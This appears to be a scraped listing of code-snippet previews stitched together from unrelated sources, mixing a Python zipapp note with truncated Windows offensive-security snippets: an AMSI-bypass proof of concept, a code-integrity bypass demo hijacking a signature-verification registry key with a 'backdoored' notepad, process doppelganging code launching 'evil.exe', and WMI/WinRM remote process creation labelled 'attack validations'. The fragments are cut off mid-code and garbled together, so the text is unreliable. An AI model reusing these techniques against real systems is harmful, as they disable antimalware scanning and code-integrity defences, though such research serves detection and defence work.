This concept is very much like .jar
or .war
archives in Java.
NOTE: The built
.pyz
zipapp can run on both Python 2 & 3 but you can only build.pyz
zipapps with Python 3.5 or later.
package main | |
/* | |
Example Go program with multiple .NET Binaries embedded | |
This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with: | |
$ go get -u github.com/gobuffalo/packr/packr | |
Place all your EXEs are in a "binaries" folder |
<?xml version="1.0"?> | |
<SiPolicy xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="urn:schemas-microsoft-com:sipolicy"> | |
<VersionEx>10.0.17689.0</VersionEx> | |
<PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID> | |
<PolicyID>{D2BDA982-CCF6-4344-AC5B-0B44427B6816}</PolicyID> | |
<BasePolicyID>{D2BDA982-CCF6-4344-AC5B-0B44427B6816}</BasePolicyID> | |
<Rules> | |
<Rule> | |
<Option>Enabled:Unsigned System Integrity Policy</Option> | |
</Rule> |
$path = "\??\C:\Users\$env:USERNAME\Desktop\bin\evil.exe" | |
$sect = New-NtSectionImage -Path $path | |
$p = [NtApiDotNet.NtProcess]::CreateProcessEx($sect) | |
Get-NtStatus $p.ExitStatus | |
[NtApiDotNet.NtThread]::Create($p, 0, 0, "Suspended", 4096) | |
Get-NtStatus $p.ExitStatus |
$FunctionSig = @" | |
[DllImport("kernel32.dll")] | |
public static extern IntPtr OpenProcess(uint access, bool inherit, uint pid); | |
"@ | |
$kernel32 = Add-Type -MemberDefinition $FunctionSig -Name "Process" -Namespace Win32Functions -PassThru | |
$kernel32::OpenProcess(0x1000, $false, 7520) |
# Ensure System.Security assembly is loaded. | |
Add-Type -AssemblyName System.Security | |
function ConvertTo-CIPolicy { | |
<# | |
.SYNOPSIS | |
Converts a binary file that contains a Code Integrity policy into XML format. | |
Author: Matthew Graeber (@mattifestation) |
This concept is very much like .jar
or .war
archives in Java.
NOTE: The built
.pyz
zipapp can run on both Python 2 & 3 but you can only build.pyz
zipapps with Python 3.5 or later.
// | |
// Ref = src | |
// https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf | |
// | |
// Credits: | |
// Vyacheslav Rusakov @swwwolf | |
// Tom Bonner @thomas_bonner | |
// | |
#include <Windows.h> |
#region Attack validations | |
wmic /node:169.254.37.139 /user:Administrator /password:badpassword process call create notepad.exe | |
Invoke-WmiMethod -ComputerName 169.254.37.139 -Credential Administrator -Class Win32_Process -Name Create -ArgumentList notepad.exe | |
$CimSession = New-CimSession -ComputerName 169.254.37.139 -Credential Administrator | |
Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = 'notepad.exe' } | |
$CimSession | Remove-CimSession | |
winrm --% invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -remote:169.254.37.139 -username:Administrator -password:badpassword |
$Host.Runspace.LanguageMode | |
Get-AuthenticodeSignature -FilePath C:\Demo\bypass_test.psm1 | |
Get-AuthenticodeSignature -FilePath C:\Demo\notepad_backdoored.exe | |
# Try to execute the script. Add-Type will fail. | |
Import-Module C:\Demo\bypass_test.psm1 | |
$VerifyHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' + | |
'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData' |
function Subvert-CLRAntiMalware { | |
<# | |
.SYNOPSIS | |
A proof-of-concept demonstrating overwriting a global variable that stores a pointer to an antimalware scan interface context structure. This PoC was only built to work with .NET Framework Early Access build 3694. | |
.DESCRIPTION | |
clr.dll in .NET Framework Early Access build 3694 has a global variable that stores a pointer to an antimalware scan interface context structure. By reading the pointer at that offset and then overwriting the forst DWORD, the context structure will become corrupted and subsequent scanning calls will fail open. |